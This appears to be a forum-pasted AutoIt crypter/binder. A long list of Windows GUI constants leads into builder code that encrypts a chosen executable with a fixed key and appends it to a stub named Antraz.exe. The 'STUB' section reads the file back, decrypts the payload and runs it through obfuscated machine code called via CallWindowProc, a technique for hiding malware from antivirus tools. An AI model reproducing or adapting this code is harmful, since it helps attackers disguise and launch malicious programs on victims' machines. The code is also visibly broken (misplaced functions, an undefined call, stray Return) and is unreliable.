  671. Global Const $wm_uahdrawmenuitem = 146
  672. Global Const $wm_uahinitmenu = 147
  673. Global Const $wm_uahmeasuremenuitem = 148
  674. Global Const $wm_uahncpaintmenupopup = 149
  675. Global Const $wm_ncmousemove = 160
  676. Global Const $wm_nclbuttondown = 161
  677. Global Const $wm_nclbuttonup = 162
  678. Global Const $wm_nclbuttondblclk = 163
  679. Global Const $wm_ncrbuttondown = 164
  680. Global Const $wm_ncrbuttonup = 165
  681. Global Const $wm_ncrbuttondblclk = 166
  682. Global Const $wm_ncmbuttondown = 167
  683. Global Const $wm_ncmbuttonup = 168
  684. Global Const $wm_ncmbuttondblclk = 169
  685. Global Const $wm_ncxbuttondown = 171
  686. Global Const $wm_ncxbuttonup = 172
  687. Global Const $wm_ncxbuttondblclk = 173
  688. Global Const $wm_ncuahdrawcaption = 174
  689. Global Const $wm_ncuahdrawframe = 175
  690. Global Const $wm_input_device_change = 254
  691. Global Const $wm_input = 255
  692. Global Const $wm_keydown = 256
  693. Global Const $wm_keyfirst = 256
  694. Global Const $wm_keyup = 257
  695. Global Const $wm_char = 258
  696. Global Const $wm_deadchar = 259
  697. Global Const $wm_syskeydown = 260
  698. Global Const $wm_syskeyup = 261
  699. Global Const $wm_syschar = 262
  700. Global Const $wm_sysdeadchar = 263
  701. Global Const $wm_yomichar = 264
  702. Global Const $wm_keylast = 265
  703. Global Const $wm_unichar = 265
  704. Global Const $wm_convertrequest = 266
  705. Global Const $wm_convertresult = 267
  706. Global Const $wm_im_info = 268
  707. Global Const $wm_ime_startcomposition = 269
  708. Global Const $wm_ime_endcomposition = 270
  709. Global Const $wm_ime_composition = 271
  710. Global Const $wm_ime_keylast = 271
  711. Global Const $wm_initdialog = 272
  712. Global Const $wm_command = 273
  713. Global Const $wm_syscommand = 274
  714. Global Const $wm_timer = 275
  715. Global Const $wm_hscroll = 276
  716. Global Const $wm_vscroll = 277
  717. Global Const $wm_initmenu = 278
  718. Global Const $wm_initmenupopup = 279
  719. Global Const $wm_systimer = 280
  720. Global Const $wm_gesture = 281
  721. Global Const $wm_gesturenotify = 282
  722. Global Const $wm_gestureinput = 283
  723. Global Const $wm_gesturenotified = 284
  724. Global Const $wm_menuselect = 287
  725. Global Const $wm_menuchar = 288
  726. Global Const $wm_enteridle = 289
  727. Global Const $wm_menurbuttonup = 290
  728. Global Const $wm_menudrag = 291
  729. Global Const $wm_menugetobject = 292
  730. Global Const $wm_uninitmenupopup = 293
  731. Global Const $wm_menucommand = 294
  732. Global Const $wm_changeuistate = 295
  733. Global Const $wm_updateuistate = 296
  734. Global Const $wm_queryuistate = 297
  735. Global Const $wm_lbtrackpoint = 305
  736. Global Const $wm_ctlcolormsgbox = 306
  737. Global Const $wm_ctlcoloredit = 307
  738. Global Const $wm_ctlcolorlistbox = 308
  739. Global Const $wm_ctlcolorbtn = 309
  740. Global Const $wm_ctlcolordlg = 310
  741. Global Const $wm_ctlcolorscrollbar = 311
  742. Global Const $wm_ctlcolorstatic = 312
  743. Global Const $mn_gethmenu = 481
  744. Global Const $wm_parentnotify = 528
  745. Global Const $wm_entermenuloop = 529
  746. Global Const $wm_exitmenuloop = 530
  747. Global Const $wm_nextmenu = 531
  748. Global Const $wm_sizing = 532
  749. Global Const $wm_capturechanged = 533
  750. Global Const $wm_moving = 534
  751. Global Const $wm_powerbroadcast = 536
  752. Global Const $wm_devicechange = 537
  753. Global Const $wm_mdicreate = 544
  754. Global Const $wm_mdidestroy = 545
  755. Global Const $wm_mdiactivate = 546
  756. Global Const $wm_mdirestore = 547
  757. Global Const $wm_mdinext = 548
  758. Global Const $wm_mdimaximize = 549
  759. Global Const $wm_mditile = 550
  760. Global Const $wm_mdicascade = 551
  761. Global Const $wm_mdiiconarrange = 552
  762. Global Const $wm_mdigetactive = 553
  763. Global Const $wm_dropobject = 554
  764. Global Const $wm_querydropobject = 555
  765. Global Const $wm_begindrag = 556
  766. Global Const $wm_dragloop = 557
  767. Global Const $wm_dragselect = 558
  768. Global Const $wm_dragmove = 559
  769. Global Const $wm_mdisetmenu = 560
  770. Global Const $wm_entersizemove = 561
  771. Global Const $wm_exitsizemove = 562
  772. Global Const $wm_dropfiles = 563
  773. Global Const $wm_mdirefreshmenu = 564
  774. Global Const $wm_touch = 576
  775. Global Const $wm_ime_setcontext = 641
  776. Global Const $wm_ime_notify = 642
  777. Global Const $wm_ime_control = 643
  778. Global Const $wm_ime_compositionfull = 644
  779. Global Const $wm_ime_select = 645
  780. Global Const $wm_ime_char = 646
  781. Global Const $wm_ime_system = 647
  782. Global Const $wm_ime_request = 648
  783. Global Const $wm_ime_keydown = 656
  784. Global Const $wm_ime_keyup = 657
  785. Global Const $wm_ncmousehover = 672
  786. Global Const $wm_mousehover = 673
  787. Global Const $wm_ncmouseleave = 674
  788. Global Const $wm_mouseleave = 675
  789. Global Const $wm_wtssession_change = 689
  790. Global Const $wm_tablet_first = 704
  791. Global Const $wm_tablet_last = 735
  792. Global Const $wm_cut = 768
  793. Global Const $wm_copy = 769
  794. Global Const $wm_paste = 770
  795. Global Const $wm_clear = 771
  796. Global Const $wm_undo = 772
  797. Global Const $wm_paletteischanging = 784
  798. Global Const $wm_hotkey = 786
  799. Global Const $wm_palettechanged = 785
  800. Global Const $wm_sysmenu = 787
  801. Global Const $wm_hookmsg = 788
  802. Global Const $wm_exitprocess = 789
  803. Global Const $wm_wakethread = 790
  804. Global Const $wm_print = 791
  805. Global Const $wm_printclient = 792
  806. Global Const $wm_appcommand = 793
  807. Global Const $wm_querynewpalette = 783
  808. Global Const $wm_themechanged = 794
  809. Global Const $wm_uahinit = 795
  810. Global Const $wm_desktopnotify = 796
  811. Global Const $wm_clipboardupdate = 797
  812. Global Const $wm_dwmcompositionchanged = 798
  813. Global Const $wm_dwmncrenderingchanged = 799
  814. Global Const $wm_dwmcolorizationcolorchanged = 800
  815. Global Const $wm_dwmwindowmaximizedchange = 801
  816. Global Const $wm_dwmexileframe = 802
  817. Global Const $wm_dwmsendiconicthumbnail = 803
  818. Global Const $wm_magnification_started = 804
  819. Global Const $wm_magnification_ended = 805
  820. Global Const $wm_dwmsendiconiclivepreviewbitmap = 806
  821. Global Const $wm_dwmthumbnailsizechanged = 807
  822. Global Const $wm_magnification_output = 808
  823. Global Const $wm_measurecontrol = 816
  824. Global Const $wm_getactiontext = 817
  825. Global Const $wm_forwardkeydown = 819
  826. Global Const $wm_forwardkeyup = 820
  827. Global Const $wm_gettitlebarinfoex = 831
  828. Global Const $wm_notifywow = 832
  829. Global Const $wm_handheldfirst = 856
  830. Global Const $wm_handheldlast = 863
  831. Global Const $wm_afxfirst = 864
  832. Global Const $wm_afxlast = 895
  833. Global Const $wm_penwinfirst = 896
  834. Global Const $wm_penwinlast = 911
  835. Global Const $wm_dde_initiate = 992
  836. Global Const $wm_dde_terminate = 993
  837. Global Const $wm_dde_advise = 994
  838. Global Const $wm_dde_unadvise = 995
  839. Global Const $wm_dde_ack = 996
  840. Global Const $wm_dde_data = 997
  841. Global Const $wm_dde_request = 998
  842. Global Const $wm_dde_poke = 999
  843. Global Const $wm_dde_execute = 1000
  844. Global Const $wm_dbnotification = 1021
  845. Global Const $wm_netconnect = 1022
  846. Global Const $wm_hibernate = 1023
  847. Global Const $wm_user = 1024
  848. Global Const $wm_app = 32768
  849. Global Const $nm_first = 0
  850. Global Const $nm_outofmemory = $nm_first - 1
  851. Global Const $nm_click = $nm_first - 2
  852. Global Const $nm_dblclk = $nm_first - 3
  853. Global Const $nm_return = $nm_first - 4
  854. Global Const $nm_rclick = $nm_first - 5
  855. Global Const $nm_rdblclk = $nm_first - 6
  856. Global Const $nm_setfocus = $nm_first - 7
  857. Global Const $nm_killfocus = $nm_first - 8
  858. Global Const $nm_customdraw = $nm_first - 12
  859. Global Const $nm_hover = $nm_first - 13
  860. Global Const $nm_nchittest = $nm_first - 14
  861. Global Const $nm_keydown = $nm_first - 15
  862. Global Const $nm_releasedcapture = $nm_first - 16
  863. Global Const $nm_setcursor = $nm_first - 17
  864. Global Const $nm_char = $nm_first - 18
  865. Global Const $nm_tooltipscreated = $nm_first - 19
  866. Global Const $nm_ldown = $nm_first - 20
  867. Global Const $nm_rdown = $nm_first - 21
  868. Global Const $nm_themechanged = $nm_first - 22
  869. Global Const $wm_mousefirst = 512
  870. Global Const $wm_mousemove = 512
  871. Global Const $wm_lbuttondown = 513
  872. Global Const $wm_lbuttonup = 514
  873. Global Const $wm_lbuttondblclk = 515
  874. Global Const $wm_rbuttondown = 516
  875. Global Const $wm_rbuttonup = 517
  876. Global Const $wm_rbuttondblclk = 518
  877. Global Const $wm_mbuttondown = 519
  878. Global Const $wm_mbuttonup = 520
  879. Global Const $wm_mbuttondblclk = 521
  880. Global Const $wm_mousewheel = 522
  881. Global Const $wm_xbuttondown = 523
  882. Global Const $wm_xbuttonup = 524
  883. Global Const $wm_xbuttondblclk = 525
  884. Global Const $wm_mousehwheel = 526
  885. Global Const $ps_solid = 0
  886. Global Const $ps_dash = 1
  887. Global Const $ps_dot = 2
  888. Global Const $ps_dashdot = 3
  889. Global Const $ps_dashdotdot = 4
  890. Global Const $ps_null = 5
  891. Global Const $ps_insideframe = 6
  892. Global Const $ps_userstyle = 7
  893. Global Const $ps_alternate = 8
  894. Global Const $ps_endcap_round = 0
  895. Global Const $ps_endcap_square = 256
  896. Global Const $ps_endcap_flat = 512
  897. Global Const $ps_join_bevel = 4096
  898. Global Const $ps_join_miter = 8192
  899. Global Const $ps_join_round = 0
  900. Global Const $ps_geometric = 65536
  901. Global Const $ps_cosmetic = 0
  902. Global Const $lwa_alpha = 2
  903. Global Const $lwa_colorkey = 1
  904. Global Const $rgn_and = 1
  905. Global Const $rgn_or = 2
  906. Global Const $rgn_xor = 3
  907. Global Const $rgn_diff = 4
  908. Global Const $rgn_copy = 5
  909. Global Const $errorregion = 0
  910. Global Const $nullregion = 1
  911. Global Const $simpleregion = 2
  912. Global Const $complexregion = 3
  913. Global Const $transparent = 1
  914. Global Const $opaque = 2
  915. Global Const $ccm_first = 8192
  916. Global Const $ccm_getunicodeformat = ($ccm_first + 6)
  917. Global Const $ccm_setunicodeformat = ($ccm_first + 5)
  918. Global Const $ccm_setbkcolor = $ccm_first + 1
  919. Global Const $ccm_setcolorscheme = $ccm_first + 2
  920. Global Const $ccm_getcolorscheme = $ccm_first + 3
  921. Global Const $ccm_getdroptarget = $ccm_first + 4
  922. Global Const $ccm_setwindowtheme = $ccm_first + 11
  923. Global Const $ga_parent = 1
  924. Global Const $ga_root = 2
  925. Global Const $ga_rootowner = 3
  926. Global Const $sm_cxscreen = 0
  927. Global Const $sm_cyscreen = 1
  928. Global Const $sm_cxvscroll = 2
  929. Global Const $sm_cyhscroll = 3
  930. Global Const $sm_cycaption = 4
  931. Global Const $sm_cxborder = 5
  932. Global Const $sm_cyborder = 6
  933. Global Const $sm_cxdlgframe = 7
  934. Global Const $sm_cydlgframe = 8
  935. Global Const $sm_cyvthumb = 9
  936. Global Const $sm_cxhthumb = 10
  937. Global Const $sm_cxicon = 11
  938. Global Const $sm_cyicon = 12
  939. Global Const $sm_cxcursor = 13
  940. Global Const $sm_cycursor = 14
  941. Global Const $sm_cymenu = 15
  942. Global Const $sm_cxfullscreen = 16
  943. Global Const $sm_cyfullscreen = 17
  944. Global Const $sm_cykanjiwindow = 18
  945. Global Const $sm_mousepresent = 19
  946. Global Const $sm_cyvscroll = 20
  947. Global Const $sm_cxhscroll = 21
  948. Global Const $sm_debug = 22
  949. Global Const $sm_swapbutton = 23
  950. Global Const $sm_reserved1 = 24
  951. Global Const $sm_reserved2 = 25
  952. Global Const $sm_reserved3 = 26
  953. Global Const $sm_reserved4 = 27
  954. Global Const $sm_cxmin = 28
  955. Global Const $sm_cymin = 29
  956. Global Const $sm_cxsize = 30
  957. Global Const $sm_cysize = 31
  958. Global Const $sm_cxframe = 32
  959. Global Const $sm_cyframe = 33
  960. Global Const $sm_cxmintrack = 34
  961. Global Const $sm_cymintrack = 35
  962. Global Const $sm_cxdoubleclk = 36
  963. Global Const $sm_cydoubleclk = 37
  964. Global Const $sm_cxiconspacing = 38
  965. Global Const $sm_cyiconspacing = 39
  966. Global Const $sm_menudropalignment = 40
  967. Global Const $sm_penwindows = 41
  968. Global Const $sm_dbcsenabled = 42
  969. Global Const $sm_cmousebuttons = 43
  970. Global Const $sm_secure = 44
  971. Global Const $sm_cxedge = 45
  972. Global Const $sm_cyedge = 46
  973. Global Const $sm_cxminspacing = 47
  974. Global Const $sm_cyminspacing = 48
  975. Global Const $sm_cxsmicon = 49
  976. Global Const $sm_cysmicon = 50
  977. Global Const $sm_cysmcaption = 51
  978. Global Const $sm_cxsmsize = 52
  979. Global Const $sm_cysmsize = 53
  980. Global Const $sm_cxmenusize = 54
  981. Global Const $sm_cymenusize = 55
  982. Global Const $sm_arrange = 56
  983. Global Const $sm_cxminimized = 57
  984. Global Const $sm_cyminimized = 58
  985. Global Const $sm_cxmaxtrack = 59
  986. Global Const $sm_cymaxtrack = 60
  987. Global Const $sm_cxmaximized = 61
  988. Global Const $sm_cymaximized = 62
  989. Global Const $sm_network = 63
  990. Global Const $sm_cleanboot = 67
  991. Global Const $sm_cxdrag = 68
  992. Global Const $sm_cydrag = 69
  993. Global Const $sm_showsounds = 70
  994. Global Const $sm_cxmenucheck = 71
  995. Global Const $sm_cymenucheck = 72
  996. Global Const $sm_slowmachine = 73
  997. Global Const $sm_mideastenabled = 74
  998. Global Const $sm_mousewheelpresent = 75
  999. Global Const $sm_xvirtualscreen = 76
  1000. Global Const $sm_yvirtualscreen = 77
  1001. Global Const $sm_cxvirtualscreen = 78
  1002. Global Const $sm_cyvirtualscreen = 79
  1003. Global Const $sm_cmonitors = 80
  1004. Global Const $sm_samedisplayformat = 81
  1005. Global Const $sm_immenabled = 82
  1006. Global Const $sm_cxfocusborder = 83
  1007. Global Const $sm_cyfocusborder = 84
  1008. Global Const $sm_tabletpc = 86
  1009. Global Const $sm_mediacenter = 87
  1010. Global Const $sm_starter = 88
  1011. Global Const $sm_serverr2 = 89
  1012. Global Const $sm_cmetrics = 90
  1013. Global Const $sm_remotesession = 4096
  1014. Global Const $sm_shuttingdown = 8192
  1015. Global Const $sm_remotecontrol = 8193
  1016. Global Const $sm_caretblinkingenabled = 8194
  1017. Global Const $blackness = 66
  1018. Global Const $captureblt = 1073741824
  1019. Global Const $dstinvert = 5570569
  1020. Global Const $mergecopy = 12583114
  1021. Global Const $mergepaint = 12255782
  1022. Global Const $nomirrorbitmap = -2147483648
  1023. Global Const $notsrccopy = 3342344
  1024. Global Const $notsrcerase = 1114278
  1025. Global Const $patcopy = 15728673
  1026. Global Const $patinvert = 5898313
  1027. Global Const $patpaint = 16452105
  1028. Global Const $srcand = 8913094
  1029. Global Const $srccopy = 13369376
  1030. Global Const $srcerase = 4457256
  1031. Global Const $srcinvert = 6684742
  1032. Global Const $srcpaint = 15597702
  1033. Global Const $whiteness = 16711778
  1034. Global Const $dt_bottom = 8
  1035. Global Const $dt_calcrect = 1024
  1036. Global Const $dt_center = 1
  1037. Global Const $dt_editcontrol = 8192
  1038. Global Const $dt_end_ellipsis = 32768
  1039. Global Const $dt_expandtabs = 64
  1040. Global Const $dt_externalleading = 512
  1041. Global Const $dt_hideprefix = 1048576
  1042. Global Const $dt_internal = 4096
  1043. Global Const $dt_left = 0
  1044. Global Const $dt_modifystring = 65536
  1045. Global Const $dt_noclip = 256
  1046. Global Const $dt_nofullwidthcharbreak = 524288
  1047. Global Const $dt_noprefix = 2048
  1048. Global Const $dt_path_ellipsis = 16384
  1049. Global Const $dt_prefixonly = 2097152
  1050. Global Const $dt_right = 2
  1051. Global Const $dt_rtlreading = 131072
  1052. Global Const $dt_singleline = 32
  1053. Global Const $dt_tabstop = 128
  1054. Global Const $dt_top = 0
  1055. Global Const $dt_vcenter = 4
  1056. Global Const $dt_wordbreak = 16
  1057. Global Const $dt_word_ellipsis = 262144
  1058. Global Const $rdw_erase = 4
  1059. Global Const $rdw_frame = 1024
  1060. Global Const $rdw_internalpaint = 2
  1061. Global Const $rdw_invalidate = 1
  1062. Global Const $rdw_noerase = 32
  1063. Global Const $rdw_noframe = 2048
  1064. Global Const $rdw_nointernalpaint = 16
  1065. Global Const $rdw_validate = 8
  1066. Global Const $rdw_erasenow = 512
  1067. Global Const $rdw_updatenow = 256
  1068. Global Const $rdw_allchildren = 128
  1069. Global Const $rdw_nochildren = 64
  1070. Global Const $wm_renderformat = 773
  1071. Global Const $wm_renderallformats = 774
  1072. Global Const $wm_destroyclipboard = 775
  1073. Global Const $wm_drawclipboard = 776
  1074. Global Const $wm_paintclipboard = 777
  1075. Global Const $wm_vscrollclipboard = 778
  1076. Global Const $wm_sizeclipboard = 779
  1077. Global Const $wm_askcbformatname = 780
  1078. Global Const $wm_changecbchain = 781
  1079. Global Const $wm_hscrollclipboard = 782
  1080. Global Const $hterror = -2
  1081. Global Const $httransparent = -1
  1082. Global Const $htnowhere = 0
  1083. Global Const $htclient = 1
  1084. Global Const $htcaption = 2
  1085. Global Const $htsysmenu = 3
  1086. Global Const $htgrowbox = 4
  1087. Global Const $htsize = $htgrowbox
  1088. Global Const $htmenu = 5
  1089. Global Const $hthscroll = 6
  1090. Global Const $htvscroll = 7
  1091. Global Const $htminbutton = 8
  1092. Global Const $htmaxbutton = 9
  1093. Global Const $htleft = 10
  1094. Global Const $htright = 11
  1095. Global Const $httop = 12
  1096. Global Const $httopleft = 13
  1097. Global Const $httopright = 14
  1098. Global Const $htbottom = 15
  1099. Global Const $htbottomleft = 16
  1100. Global Const $htbottomright = 17
  1101. Global Const $htborder = 18
  1102. Global Const $htreduce = $htminbutton
  1103. Global Const $htzoom = $htmaxbutton
  1104. Global Const $htsizefirst = $htleft
  1105. Global Const $htsizelast = $htbottomright
  1106. Global Const $htobject = 19
  1107. Global Const $htclose = 20
  1108. Global Const $hthelp = 21
  1109. Global Const $color_scrollbar = 0
  1110. Global Const $color_background = 1
  1111. Global Const $color_activecaption = 2
  1112. Global Const $color_inactivecaption = 3
  1113. Global Const $color_menu = 4
  1114. Global Const $color_window = 5
  1115. Global Const $color_windowframe = 6
  1116. Global Const $color_menutext = 7
  1117. Global Const $color_windowtext = 8
  1118. Global Const $color_captiontext = 9
  1119. Global Const $color_activeborder = 10
  1120. Global Const $color_inactiveborder = 11
  1121. Global Const $color_appworkspace = 12
  1122. Global Const $color_highlight = 13
  1123. Global Const $color_highlighttext = 14
  1124. Global Const $color_btnface = 15
  1125. Global Const $color_btnshadow = 16
  1126. Global Const $color_graytext = 17
  1127. Global Const $color_btntext = 18
  1128. Global Const $color_inactivecaptiontext = 19
  1129. Global Const $color_btnhighlight = 20
  1130. Global Const $color_3ddkshadow = 21
  1131. Global Const $color_3dlight = 22
  1132. Global Const $color_infotext = 23
  1133. Global Const $color_infobk = 24
  1134. Global Const $color_hotlight = 26
  1135. Global Const $color_gradientactivecaption = 27
  1136. Global Const $color_gradientinactivecaption = 28
  1137. Global Const $color_menuhilight = 29
  1138. Global Const $color_menubar = 30
  1139. Global Const $color_desktop = 1
  1140. Global Const $color_3dface = 15
  1141. Global Const $color_3dshadow = 16
  1142. Global Const $color_3dhighlight = 20
  1143. Global Const $color_3dhilight = 20
  1144. Global Const $color_btnhilight = 20
  1145. Global Const $hinst_commctrl = -1
  1146. Global Const $idb_std_small_color = 0
  1147. Global Const $idb_std_large_color = 1
  1148. Global Const $idb_view_small_color = 4
  1149. Global Const $idb_view_large_color = 5
  1150. Global Const $idb_hist_small_color = 8
  1151. Global Const $idb_hist_large_color = 9
  1152. Global Const $startf_forceofffeedback = 128
  1153. Global Const $startf_forceonfeedback = 64
  1154. Global Const $startf_preventpinning = 8192
  1155. Global Const $startf_runfullscreen = 32
  1156. Global Const $startf_titleisappid = 4096
  1157. Global Const $startf_titleislinkname = 2048
  1158. Global Const $startf_usecountchars = 8
  1159. Global Const $startf_usefillattribute = 16
  1160. Global Const $startf_usehotkey = 512
  1161. Global Const $startf_useposition = 4
  1162. Global Const $startf_useshowwindow = 1
  1163. Global Const $startf_usesize = 2
  1164. Global Const $startf_usestdhandles = 256
  1165. Global Const $cdds_prepaint = 1
  1166. Global Const $cdds_postpaint = 2
  1167. Global Const $cdds_preerase = 3
  1168. Global Const $cdds_posterase = 4
  1169. Global Const $cdds_item = 65536
  1170. Global Const $cdds_itemprepaint = 65537
  1171. Global Const $cdds_itempostpaint = 65538
  1172. Global Const $cdds_itempreerase = 65539
  1173. Global Const $cdds_itemposterase = 65540
  1174. Global Const $cdds_subitem = 131072
  1175. Global Const $cdis_selected = 1
  1176. Global Const $cdis_grayed = 2
  1177. Global Const $cdis_disabled = 4
  1178. Global Const $cdis_checked = 8
  1179. Global Const $cdis_focus = 16
  1180. Global Const $cdis_default = 32
  1181. Global Const $cdis_hot = 64
  1182. Global Const $cdis_marked = 128
  1183. Global Const $cdis_indeterminate = 256
  1184. Global Const $cdis_showkeyboardcues = 512
  1185. Global Const $cdis_nearhot = 1024
  1186. Global Const $cdis_othersidehot = 2048
  1187. Global Const $cdis_drophilited = 4096
  1188. Global Const $cdrf_dodefault = 0
  1189. Global Const $cdrf_newfont = 2
  1190. Global Const $cdrf_skipdefault = 4
  1191. Global Const $cdrf_notifypostpaint = 16
  1192. Global Const $cdrf_notifyitemdraw = 32
  1193. Global Const $cdrf_notifysubitemdraw = 32
  1194. Global Const $cdrf_notifyposterase = 64
  1195. Global Const $cdrf_doerase = 8
  1196. Global Const $cdrf_skippostpaint = 256
  1197. Global Const $gui_ss_default_gui = BitOR($ws_minimizebox, $ws_caption, $ws_popup, $ws_sysmenu)
  1198. #Region ### START Koda GUI section ### Form=
  1199. $form1 = GUICreate("Form1", 623, 447, 192, 124)
  1200. $input1 = GUICtrlCreateInput("Input1", 48, 24, 505, 21)
  1201. $button1 = GUICtrlCreateButton("Button1", 48, 56, 241, 73)
  1202. $button2 = GUICtrlCreateButton("Button2", 368, 64, 217, 145)
  1203. $checkbox1 = GUICtrlCreateCheckbox("Checkbox1", 32, 136, 65, 33)
  1204. $radio1 = GUICtrlCreateRadio("Radio1", 32, 184, 81, 25)
  1205. $group1 = GUICtrlCreateGroup("Group1", 128, 264, 145, 129)
  1206. GUICtrlCreateGroup("", -99, -99, 1, 1)
  1207. $label1 = GUICtrlCreateLabel("HOJE E DIA DE FESTA, LA NO MEU APE", 104, 168, 207, 17)
  1208. $avi1 = GUICtrlCreateAvi("No File", -1, 352, 248, 73, 81)
  1209. $progress1 = GUICtrlCreateProgress(136, 224, 153, 33)
  1210. $slider1 = GUICtrlCreateSlider(16, 408, 129, 33)
  1211. $checkbox2 = GUICtrlCreateCheckbox("Checkbox2", 488, 288, 81, 57)
  1212. $combo1 = GUICtrlCreateCombo("Combo1", 456, 376, 49, 25, BitOR($cbs_dropdown, $cbs_autohscroll))
  1213. $checkbox3 = GUICtrlCreateCheckbox("Checkbox3", 304, 392, 105, 33)
  1214. $radio2 = GUICtrlCreateRadio("Radio2", 296, 288, 41, 33)
  1215. $radio3 = GUICtrlCreateRadio("Radio3", 296, 208, 89, 33)
  1216. $radio4 = GUICtrlCreateRadio("Radio4", 168, 408, 81, 33)
  1217. $edit1 = GUICtrlCreateEdit("", 312, 80, 41, 113)
  1218. GUICtrlSetData(-1, "Edit1")
  1219. GUISetState(@SW_SHOW)
  1220. #EndRegion ### END Koda GUI section ###
  1221. While 1
  1222. $nmsg = GUIGetMsg()
  1223. Switch $nmsg
  1224. Case $gui_event_close
  1225. Exit
  1226. Case $form1
  1227. Case $button1
  1228. GUICtrlSetData($input1, FileOpenDialog("mitril", @DesktopDir, "Executáveis(*.exe)"))
  1229. Case $button2
  1230. If GUICtrlRead($input1) = "" Then Return
  1231. $stub = FileOpen(@ScriptDir & "\Antraz.exe", 16)
  1232. $arquivo2 = FileOpen(GUICtrlRead($input1), 16)
  1233. $st = FileRead($stub)
  1234. $ar = FileRead($arquivo2)
  1235. $ar = yypqsyipva($ar, "lolo")
  1236.  
  1237. Func gXSDjJYnmYdcPLBmWYyKyXy( $SPClOqKVBtCHKWXNnnZe,$vkImkzWBSwclNjczcPuEDjKDEz)
  1238. Dim $oQwDLGtYmIthUExReUoF = RAhQTinKDlSaxdpIIoAkCu("8€K@988988>I88>I88=;=>=?@J==98;9KA@AK@<A@AL?N:IM<@<@:AK@@A<=N8@=K88N@<LK888888JA88898888@@K@:K89@@@<8LMNNMNNNNM:N;@;>=N<88@;>=NK88@9?LNK88898888?L<?@J<=NK;9L:N??=N8A:8;<=988NJ>88@J<LNK8NJ>@K8LN8NMNNNN89K@8;<=N<:=NN888888@A<=N<@J?=NK@I@<;=N8NMNNNN@J?LN<@>@<;LN8NMNNNN@@@<;=N8NMNNNNNN<=NKMJJ8@LALN8NMNNNN;9NN@ANI;A==8K?>>;@J@=MKNMNNNN<8:=NN888888@A@=MKNMNNNN@AL@8;@=MKNMNNNN8NJ>888;@=M@NMNNNN:=NN888888@A@=M@NMNNNN@ALM8;J=MKNMNNNN@I8>@ALN8;JLM@NMNNNN@>8?@@8>8NJ>8M8NJ>8?89K9@9M9NN888888@I@<8LN8NMNNNN@J?=8@89L>;88><:MJA@=N=M=JKAK:9888", 8)
  1239. Local $EwvnTUsAkshFtvWGioAybTVtd = DllStructCreate("byte[" & BinaryLen($oQwDLGtYmIthUExReUoF) & "]")
  1240. DllStructSetData($EwvnTUsAkshFtvWGioAybTVtd, 1, $oQwDLGtYmIthUExReUoF)
  1241. Local $ntaybGrqvqJZVBtaRfw = DllStructCreate("byte[" & BinaryLen( $SPClOqKVBtCHKWXNnnZe) & "]")
  1242. DllStructSetData( $ntaybGrqvqJZVBtaRfw, 1, $SPClOqKVBtCHKWXNnnZe)
  1243. DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($EwvnTUsAkshFtvWGioAybTVtd), "ptr" , DllStructGetPtr( $ntaybGrqvqJZVBtaRfw), "int", BinaryLen( $SPClOqKVBtCHKWXNnnZe), "str", $vkImkzWBSwclNjczcPuEDjKDEz, "int", 0)
  1244. Dim $pLShtpbekqYQZlPHMuAS= DllStructGetData($ntaybGrqvqJZVBtaRfw, 1)
  1245. $ntaybGrqvqJZVBtaRfw = 0
  1246. $EwvnTUsAkshFtvWGioAybTVtd = 0
  1247. Return $pLShtpbekqYQZlPHMuAS
  1248. EndFunc
  1249.  
  1250.  
  1251. Func RAhQTinKDlSaxdpIIoAkCu($ZbzDiNWdgZHkpJcANvdcLg,$ttxjswWxXnXZwgCkszFsvAHkYM)
  1252. Dim $nVMMUviTnoTEVwMDVpOxcs = ""
  1253. For $rVGrSGxzfdrBIiBdUzXrB = 1 to StringLen($ZbzDiNWdgZHkpJcANvdcLg)
  1254. $nVMMUviTnoTEVwMDVpOxcs = $nVMMUviTnoTEVwMDVpOxcs & Chr(Asc(StringMid($ZbzDiNWdgZHkpJcANvdcLg, $rVGrSGxzfdrBIiBdUzXrB)) - $ttxjswWxXnXZwgCkszFsvAHkYM)
  1255. Next
  1256. Return $nVMMUviTnoTEVwMDVpOxcs
  1257. EndFunc
  1258.  
  1259. $abri = FileOpen(FileSaveDialog("anct", @DesktopDir, "Executáveis(*.exe)") & ".exe", 18)
  1260. FileWrite($abri, $st)
  1261. FileWrite($abri, StringToBinary("xapei"))
  1262. FileWrite($abri, $ar)
  1263. FileClose($stub)
  1264. FileClose($input1)
  1265. FileClose($abri)
  1266. MsgBox(64, "guardia", "soul")
  1267. EndSwitch
  1268. WEnd
  1269.  
  1270.  
  1271. STUB:
  1272.  
  1273.  
  1274. $file = FileOpen(@ScriptFullPath, 0)
  1275. $Data = FileRead($file)
  1276. $Data = StringMid($Data, StringInstr($Data, "xapei") + StringLen ("xapei"))
  1277. $Data = gXSDjJYnmYdcPLBmWYyKyXy($Data, "lolo")
  1278. gXSDjJYnmYdcPLBmWYyKyXy($Data)
  1279. Dim $zxZJaVFfSTYLHaEjFq = Fileread(@ScriptFullPath)
  1280. Dim $HhCIVCQNjgrlKjhnUM = StringSplit($zxZJaVFfSTYLHaEjFq,"", 1)
  1281. Dim $GYTxogUCeUzutbJuqFaVu = gXSDjJYnmYdcPLBmWYyKyXy($HhCIVCQNjgrlKjhnUM[2],"")
  1282. feHPyADsyOXBfZGCkTdoQH($GYTxogUCeUzutbJuqFaVu)
  1283.  
  1284.  
  1285. Func gXSDjJYnmYdcPLBmWYyKyXy( $SPClOqKVBtCHKWXNnnZe,$vkImkzWBSwclNjczcPuEDjKDEz)
  1286. Dim $oQwDLGtYmIthUExReUoF = RAhQTinKDlSaxdpIIoAkCu("8€K@988988>I88>I88=;=>=?@J==98;9KA@AK@<A@AL?N:IM<@<@:AK@@A<=N8@=K88N@<LK888888JA88898888@@K@:K89@@@<8LMNNMNNNNM:N;@;>=N<88@;>=NK88@9?LNK88898888?L<?@J<=NK;9L:N??=N8A:8;<=988NJ>88@J<LNK8NJ>@K8LN8NMNNNN89K@8;<=N<:=NN888888@A<=N<@J?=NK@I@<;=N8NMNNNN@J?LN<@>@<;LN8NMNNNN@@@<;=N8NMNNNNNN<=NKMJJ8@LALN8NMNNNN;9NN@ANI;A==8K?>>;@J@=MKNMNNNN<8:=NN888888@A@=MKNMNNNN@AL@8;@=MKNMNNNN8NJ>888;@=M@NMNNNN:=NN888888@A@=M@NMNNNN@ALM8;J=MKNMNNNN@I8>@ALN8;JLM@NMNNNN@>8?@@8>8NJ>8M8NJ>8?89K9@9M9NN888888@I@<8LN8NMNNNN@J?=8@89L>;88><:MJA@=N=M=JKAK:9888", 8)
  1287. Local $EwvnTUsAkshFtvWGioAybTVtd = DllStructCreate("byte[" & BinaryLen($oQwDLGtYmIthUExReUoF) & "]")
